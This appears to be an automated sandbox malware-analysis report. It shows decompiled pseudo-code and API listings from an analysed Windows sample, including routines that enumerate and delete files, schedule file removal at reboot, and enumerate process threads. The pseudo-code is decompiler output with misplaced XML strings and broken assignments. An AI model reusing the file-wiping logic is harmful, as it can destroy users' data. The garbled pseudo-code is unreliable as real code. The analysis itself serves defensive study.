                                                                                                                        				_t43 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
                                                                                                                        				_t49 = _t53 + wsprintfA( &(_v840.cAlternateFileName), "%s", _t43) + 0x160;
                                                                                                                        				wsprintfA(_t49, "%s%c%s", 0x6f33d543, 0x2a, _v4);
                                                                                                                        				_t54 =  &(_t53->nFileSizeLow);
                                                                                                                        				_t25 = FindFirstFileA( &_v520,  &_v840); // executed
                                                                                                                        				_t48 = _t25;
                                                                                                                        				 *_t49 = 0;
                                                                                                                        				if(_t48 == 0xffffffff) {
                                                                                                                        					return _t25;
                                                                                                                        				} else {
                                                                                                                        					_t36 = _a8;
                                                                                                                        					do {
                                                                                                                        						if(lstrcmpA( &(_v840.cFileName), ".") != 0 && lstrcmpA( &(_v840.cFileName), "..") != 0) {
                                                                                                                        							lstrcatA( &_v520,  &(_v840.cFileName));
                                                                                                                        							if((_v840.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                        								if(_t36 == 0) {
                                                                                                                        									E6F332750( &_v520);
                                                                                                                        									_t54 =  &(_t54[1]);
                                                                                                                        								} else {
                                                                                                                        									DeleteFileA( &_v520);
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						 *_t49 = 0;
                                                                                                                        					} while (FindNextFileA(_t48,  &_v840) != 0);
                                                                                                                        					return FindClose(_t48);
                                                                                                                        				}
                                                                                                                        			}














                                                                                                                        APIs
                                                                                                                        • RtlZeroMemory.NTDLL(00000140,00000140), ref: 6F3328C2
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000208), ref: 6F3328D4
                                                                                                                        • wsprintfA.USER32 ref: 6F3328F3
                                                                                                                        • wsprintfA.USER32 ref: 6F332911
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 6F332923
                                                                                                                        • lstrcmpA.KERNEL32(?,6F33D538,00000000,?), ref: 6F332950
                                                                                                                        • lstrcmpA.KERNEL32(?,6F33D534), ref: 6F332960
                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 6F332973
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 6F33298C
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 6F3329AD
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 6F3329B8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$MemoryZerolstrcmpwsprintf$CloseDeleteFirstNextlstrcat
                                                                                                                        • String ID: %s%c%s
                                                                                                                        • API String ID: 1322953341-2756932909
                                                                                                                        • Opcode ID: a77709927d85bdddff63a9056d814544ab56a81affef240bec6227ea869c1012
                                                                                                                        • Instruction ID: d6b98663d72a1ff9cbf405f5d9242ef888dd8abf659fcc356b496d4c2fbdd1d7
                                                                                                                        • Opcode Fuzzy Hash: a77709927d85bdddff63a9056d814544ab56a81affef240bec6227ea869c1012
                                                                                                                        • Instruction Fuzzy Hash: 8D2191739043D9EBD724DBA4CC44EEBB7EDAF8A314F04491DF69482180EB71E1188762
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BF3CB
                                                                                                                        • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000,000000F4), ref: 004BF436
                                                                                                                        • FindFirstFileW.KERNEL32(?,00000000,0077C1F8,00000000), ref: 004BF47A
                                                                                                                        • FindClose.KERNEL32(?), ref: 004BF4A5
                                                                                                                        • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,000000F4), ref: 004BF6A3
                                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,0044D1D9,00000000), ref: 004A1804
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: FindH_prolog3InformationVolume$CloseCriticalFileFirstInitializeSection
                                                                                                                        • String ID: %x%x$C:\$_%x%x
                                                                                                                        • API String ID: 596022118-2960449516
                                                                                                                        • Opcode ID: af15d0e1a138e9fb1e2b282ef002459527b2498bbac3ecb482b5d3beb8cb70f6
                                                                                                                        • Instruction ID: ff7ae4a22af98f1ede601656746b62f7d23d60e92932ca53c8e4e25f4943a0b2
                                                                                                                        • Opcode Fuzzy Hash: af15d0e1a138e9fb1e2b282ef002459527b2498bbac3ecb482b5d3beb8cb70f6
                                                                                                                        • Instruction Fuzzy Hash: 77C18074C00148EEDF11EBA4CD51BEEBB79AF25308F1480AEE105A31A2DB785F49CB65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 88%
                                                                                                                        			E6F332DF0(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                        				char _v512;
                                                                                                                        				char _v520;
                                                                                                                        				char _v832;
                                                                                                                        				struct _WIN32_FIND_DATAA _v840;
                                                                                                                        				void* _t18;
                                                                                                                        				signed char _t19;
                                                                                                                        				CHAR* _t26;
                                                                                                                        				intOrPtr _t29;
                                                                                                                        				void* _t36;
                                                                                                                        				void* _t37;
                                                                                                                        				FILETIME* _t40;
                                                                                                                        
                                                                                                                        				_t29 = _a4;
                                                                                                                        				_t37 = 0;
                                                                                                                        				wsprintfA( &_v520, "%s%c%s", _t29, 0x2a, _a8);
                                                                                                                        				_t40 =  &( &_v840->ftLastWriteTime);
                                                                                                                        				_push(0x140);
                                                                                                                        				_push( &_v832);
                                                                                                                        				L6F33C2EE();
                                                                                                                        				_t18 = FindFirstFileA( &_v520,  &_v840); // executed
                                                                                                                        				_t36 = _t18;
                                                                                                                        				if(_t36 != 0xffffffff) {
                                                                                                                        					do {
                                                                                                                        						_t19 = _v840.dwFileAttributes;
                                                                                                                        						if((_t19 & 0x00000010) == 0 && _t19 != 0) {
                                                                                                                        							wsprintfA( &_v520, "%s%s", _t29,  &(_v840.cFileName));
                                                                                                                        							_t40 = _t40 + 0x10;
                                                                                                                        							_t26 = DeleteFileA( &_v512);
                                                                                                                        							if(_t26 == 0) {
                                                                                                                        								MoveFileExA( &_v512, _t26, 4);
                                                                                                                        							}
                                                                                                                        							_t37 = 1;
                                                                                                                        						}
                                                                                                                        					} while (FindNextFileA(_t36,  &_v840) != 0);
                                                                                                                        					FindClose(_t36);
                                                                                                                        					return _t37;
                                                                                                                        				} else {
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        			}














                                                                                                                        APIs
                                                                                                                        • wsprintfA.USER32 ref: 6F332E1E
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000140), ref: 6F332E2D
                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,00000140), ref: 6F332E3F
                                                                                                                        • wsprintfA.USER32 ref: 6F332E7F
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 6F332E8C
                                                                                                                        • MoveFileExA.KERNEL32 ref: 6F332EA1
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 6F332EB2
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 6F332EBD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find$wsprintf$CloseDeleteFirstMemoryMoveNextZero
                                                                                                                        • String ID: %s%c%s$%s%s
                                                                                                                        • API String ID: 3499340181-3555087778
                                                                                                                        • Opcode ID: 1e441bb8b4b3cb56a1f0265f5d2aff9d2d82852ddff8eecaa43896e3dead2926
                                                                                                                        • Instruction ID: f4bc618684fe5d52835a5a6c54ff989a0e3287ad4fc953531d052855620c27db
                                                                                                                        • Opcode Fuzzy Hash: 1e441bb8b4b3cb56a1f0265f5d2aff9d2d82852ddff8eecaa43896e3dead2926
                                                                                                                        • Instruction Fuzzy Hash: 7321D573A04395ABD320DBA4DC85EEB73ADEBC8721F40091DFA54D6140EB35E11487A1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004E179B
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,0000000C), ref: 004E17CE
                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?), ref: 004E17DB
                                                                                                                        • _wcscat_s.LIBCMT ref: 004E17FA
                                                                                                                        • _memset.LIBCMT ref: 004E1818
                                                                                                                        • GetPrivateProfileStringW.KERNEL32(Installation,INSTEXE,0077C1F8,?,00000100,?), ref: 004E183F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: File$H_prolog3ModuleNamePathPrivateProfileRemoveSpecString_memset_wcscat_s
                                                                                                                        • String ID: INSTEXE$Installation$\tvinfo.ini
                                                                                                                        • API String ID: 3006198713-428253807
                                                                                                                        • Opcode ID: f3ca824da903d3d66d1a53bc91b08e0afd2a4f62bd92fcec2d77fe7164b4bddd
                                                                                                                        • Instruction ID: 509cd7efbefe80bf997b95202da801206c46533324e6e5bee6f0a68a4001ef9e
                                                                                                                        • Opcode Fuzzy Hash: f3ca824da903d3d66d1a53bc91b08e0afd2a4f62bd92fcec2d77fe7164b4bddd
                                                                                                                        • Instruction Fuzzy Hash: 1841B4B1A80249ABDB20EF65DC81AEE77A8FF45304F50402AFD05E7291DB789E09CB54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33B0A0(long* __esi) {
                                                                                                                        				long _t27;
                                                                                                                        				int _t28;
                                                                                                                        				long _t29;
                                                                                                                        				void _t31;
                                                                                                                        				long _t34;
                                                                                                                        				void* _t36;
                                                                                                                        				void* _t37;
                                                                                                                        				void* _t40;
                                                                                                                        				long _t44;
                                                                                                                        				void* _t52;
                                                                                                                        				void* _t53;
                                                                                                                        				void* _t55;
                                                                                                                        				intOrPtr _t57;
                                                                                                                        				long* _t58;
                                                                                                                        				void* _t60;
                                                                                                                        				long* _t62;
                                                                                                                        
                                                                                                                        				_t58 = __esi;
                                                                                                                        				_t62[4] = 0;
                                                                                                                        				_t27 = NtQuerySystemInformation(5, 0, 0, _t62); // executed
                                                                                                                        				if(_t27 == 0xc0000004) {
                                                                                                                        					_t27 =  *_t62;
                                                                                                                        					if(_t27 != 0) {
                                                                                                                        						_t28 = VirtualAlloc(0, _t27, 0x1000, 4); // executed
                                                                                                                        						_t55 = _t28;
                                                                                                                        						_t62[3] = _t55;
                                                                                                                        						if(_t55 == 0) {
                                                                                                                        							L23:
                                                                                                                        							return _t28;
                                                                                                                        						}
                                                                                                                        						_t29 = NtQuerySystemInformation(5, _t55, _t62[1],  &(_t62[1])); // executed
                                                                                                                        						if(_t29 < 0 || _t62[1] <= 0) {
                                                                                                                        							L22:
                                                                                                                        							_t28 = VirtualFree(_t55, _t62[1], 0x8000);
                                                                                                                        							goto L23;
                                                                                                                        						} else {
                                                                                                                        							_t60 = _t55;
                                                                                                                        							do {
                                                                                                                        								if( *((intOrPtr*)(_t60 + 0x44)) != GetCurrentProcessId()) {
                                                                                                                        									L19:
                                                                                                                        									_t31 =  *_t60;
                                                                                                                        									if(_t31 == 0) {
                                                                                                                        										break;
                                                                                                                        									}
                                                                                                                        									goto L20;
                                                                                                                        								}
                                                                                                                        								_t40 = 0;
                                                                                                                        								if( *((intOrPtr*)(_t60 + 4)) <= 0) {
                                                                                                                        									goto L19;
                                                                                                                        								}
                                                                                                                        								_t8 = _t60 + 0xdc; // 0xdc
                                                                                                                        								_t62[4] = _t8;
                                                                                                                        								do {
                                                                                                                        									_t57 =  *(_t62[4]);
                                                                                                                        									if(_t57 == GetCurrentThreadId()) {
                                                                                                                        										goto L17;
                                                                                                                        									}
                                                                                                                        									_t34 =  *_t58;
                                                                                                                        									if(_t34 != 0) {
                                                                                                                        										_t44 = _t58[1];
                                                                                                                        										if(_t58[2] < _t44) {
                                                                                                                        											L16:
                                                                                                                        											 *((intOrPtr*)( *_t58 + _t58[2] * 4)) = _t57;
                                                                                                                        											_t58[2] = _t58[2] + 1;
                                                                                                                        											goto L17;
                                                                                                                        										}
                                                                                                                        										_t52 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x2700000
                                                                                                                        										_t36 = HeapReAlloc(_t52, 0, _t34, _t44 + _t44 + _t44 + _t44 + _t44 + _t44 + _t44 + _t44);
                                                                                                                        										if(_t36 == 0) {
                                                                                                                        											break;
                                                                                                                        										}
                                                                                                                        										_t58[1] = _t58[1] + _t58[1];
                                                                                                                        										 *_t58 = _t36;
                                                                                                                        										goto L16;
                                                                                                                        									}
                                                                                                                        									_t58[1] = 0x80;
                                                                                                                        									_t53 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x2700000
                                                                                                                        									_t37 = HeapAlloc(_t53, _t34, 0x200);
                                                                                                                        									 *_t58 = _t37;
                                                                                                                        									if(_t37 == 0) {
                                                                                                                        										break;
                                                                                                                        									}
                                                                                                                        									goto L16;
                                                                                                                        									L17:
                                                                                                                        									_t62[4] = _t62[4] + 0x40;
                                                                                                                        									_t40 = _t40 + 1;
                                                                                                                        								} while (_t40 <  *((intOrPtr*)(_t60 + 4)));
                                                                                                                        								_t55 = _t62[5];
                                                                                                                        								goto L19;
                                                                                                                        								L20:
                                                                                                                        								_t60 = _t60 + _t31;
                                                                                                                        							} while (_t60 != 0);
                                                                                                                        							goto L22;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				return _t27;
                                                                                                                        			}



















                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33b1b0
                                                                                                                        0x6f33b1b0
                                                                                                                        0x6f33b1b5
                                                                                                                        0x6f33b1b6
                                                                                                                        0x6f33b1bb
                                                                                                                        0x00000000
                                                                                                                        0x6f33b1c6
                                                                                                                        0x6f33b1c6
                                                                                                                        0x6f33b1c6
                                                                                                                        0x00000000
                                                                                                                        0x6f33b1cf
                                                                                                                        0x6f33b103
                                                                                                                        0x6f33b0ca
                                                                                                                        0x6f33b1e5

                                                                                                                        APIs
                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 6F33B0B5
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000), ref: 6F33B0DB
                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 6F33B0FC
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000005,00000000,000000FF,000000FF), ref: 6F33B118
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6F33B146
                                                                                                                        • HeapAlloc.KERNEL32(02700000,00000000,00000200), ref: 6F33B16A
                                                                                                                        • HeapReAlloc.KERNEL32(02700000,00000000,00000000,?), ref: 6F33B191
                                                                                                                        • VirtualFree.KERNEL32(00000000,000000FF,00008000,00000005,00000000,000000FF,000000FF), ref: 6F33B1DB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Alloc$CurrentHeapInformationQuerySystemVirtual$FreeProcessThread
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 494489134-2766056989
                                                                                                                        • Opcode ID: 0b83c9daec83d47dc7ebbb295703b958809b84ae84161442182e0d004aec0d1a
                                                                                                                        • Instruction ID: 48e3aa18de10c5daafcc2cca0ee42305264480da770c17a9b769614c424a8162
                                                                                                                        • Opcode Fuzzy Hash: 0b83c9daec83d47dc7ebbb295703b958809b84ae84161442182e0d004aec0d1a
                                                                                                                        • Instruction Fuzzy Hash: F7314D72A04B959FE720CF24C955B6B77E9EB84B18F10841DF9968B280D771F804CB51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F337790(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                        				void* _t7;
                                                                                                                        				void* _t8;
                                                                                                                        				_Unknown_base(*)()* _t10;
                                                                                                                        				long _t11;
                                                                                                                        				void* _t12;
                                                                                                                        				long _t14;
                                                                                                                        				void* _t17;
                                                                                                                        				int _t20;
                                                                                                                        				void* _t22;
                                                                                                                        				void* _t24;
                                                                                                                        				struct HWND__* _t25;
                                                                                                                        				int _t26;
                                                                                                                        				void* _t27;
                                                                                                                        
                                                                                                                        				_t20 = _a12;
                                                                                                                        				_t26 = _a8;
                                                                                                                        				_t25 = _a4;
                                                                                                                        				_t27 = _t26 - 0x16;
                                                                                                                        				if(_t27 > 0) {
                                                                                                                        					if(_t26 == 0x18) {
                                                                                                                        						goto L15;
                                                                                                                        					} else {
                                                                                                                        						if(_t26 == 0x112) {
                                                                                                                        							_t7 = _t20 - 0xf020;
                                                                                                                        							if(_t7 == 0) {
                                                                                                                        								goto L15;
                                                                                                                        							} else {
                                                                                                                        								_t8 = _t7 - 0x10;
                                                                                                                        								if(_t8 == 0 || _t8 == 0xf0) {
                                                                                                                        									goto L15;
                                                                                                                        								} else {
                                                                                                                        									goto L19;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						} else {
                                                                                                                        							if(_t26 != 0x83fc) {
                                                                                                                        								goto L19;
                                                                                                                        							} else {
                                                                                                                        								"one=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t20; // executed
                                                                                                                        								_t12 = CreateThread(0, 0, E6F336D50, 0, 0,  &M6F3404C4); // executed
                                                                                                                        								M6F3404C0 = _t12;
                                                                                                                        								goto L15;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					if(_t27 == 0) {
                                                                                                                        						PostMessageA(_t25, 0x10, 0, 0);
                                                                                                                        						goto L19;
                                                                                                                        					} else {
                                                                                                                        						if(_t26 == 3 || _t26 == 7) {
                                                                                                                        							L15:
                                                                                                                        							return 0;
                                                                                                                        						} else {
                                                                                                                        							if(_t26 == 0x10) {
                                                                                                                        								M6F3404B0 = 1;
                                                                                                                        								if(M6F3404C0 != 0) {
                                                                                                                        									_t14 = M6F3404C4; // 0x15cc
                                                                                                                        									PostThreadMessageA(_t14, _t26, 0, 0);
                                                                                                                        									_t22 = M6F3404C0; // 0x7f0
                                                                                                                        									if(WaitForSingleObject(_t22, 0x1388) != 0) {
                                                                                                                        										_t24 = M6F3404C0; // 0x7f0
                                                                                                                        										NtTerminateThread(_t24, 0);
                                                                                                                        									}
                                                                                                                        									_t17 = M6F3404C0; // 0x7f0
                                                                                                                        									CloseHandle(_t17);
                                                                                                                        								}
                                                                                                                        								PostQuitMessage(0);
                                                                                                                        							}
                                                                                                                        							L19:
                                                                                                                        							_t10 = "one=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x770b94c0
                                                                                                                        							_t11 = CallWindowProcW(_t10, _t25, _t26, _t20, _a16); // executed
                                                                                                                        							return _t11;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}

















                                                                                                                        APIs
                                                                                                                        • PostThreadMessageA.USER32 ref: 6F3377E3
                                                                                                                        • WaitForSingleObject.KERNEL32(000007F0,00001388), ref: 6F3377F5
                                                                                                                        • NtTerminateThread.NTDLL ref: 6F337808
                                                                                                                        • CloseHandle.KERNEL32(000007F0), ref: 6F337813
                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 6F33781B
                                                                                                                        • PostMessageA.USER32 ref: 6F33782A
                                                                                                                        • CreateThread.KERNEL32 ref: 6F337861
                                                                                                                        • CallWindowProcW.USER32(770B94C0,?,?,?,?), ref: 6F337897
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread$CallCloseCreateHandleObjectProcQuitSingleTerminateWaitWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1229868629-0
                                                                                                                        • Opcode ID: 824dcab9c096e68e035363804d759b246c01f09b7ba470af863497fe13b3871a
                                                                                                                        • Instruction ID: ca06e3b13392cbce3a3c6e23bb8c6b3b4d7e50a930f95373addd9bf49e26902b
                                                                                                                        • Opcode Fuzzy Hash: 824dcab9c096e68e035363804d759b246c01f09b7ba470af863497fe13b3871a
                                                                                                                        • Instruction Fuzzy Hash: 1021D873F483A5BBEB20EA588C4AF967A6CE796721F00052EF2519B2C0C775A814CB50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 62%
                                                                                                                        			E6F338400() {
                                                                                                                        				intOrPtr _v4;
                                                                                                                        				intOrPtr _v12;
                                                                                                                        				intOrPtr _v28;
                                                                                                                        				long _v40;
                                                                                                                        				void _v44;
                                                                                                                        				void* _v48;
                                                                                                                        				intOrPtr _v56;
                                                                                                                        				long _v80;
                                                                                                                        				char _v88;
                                                                                                                        				intOrPtr _v92;
                                                                                                                        				void _v96;
                                                                                                                        				intOrPtr _v100;
                                                                                                                        				intOrPtr _v104;
                                                                                                                        				long _v108;
                                                                                                                        				intOrPtr _v116;
                                                                                                                        				intOrPtr _v128;
                                                                                                                        				long _v132;
                                                                                                                        				long _t26;
                                                                                                                        				long _t28;
                                                                                                                        				long _t30;
                                                                                                                        				void* _t31;
                                                                                                                        				intOrPtr _t32;
                                                                                                                        				intOrPtr _t42;
                                                                                                                        				long _t44;
                                                                                                                        				union _MEMORY_INFORMATION_CLASS _t47;
                                                                                                                        				void* _t49;
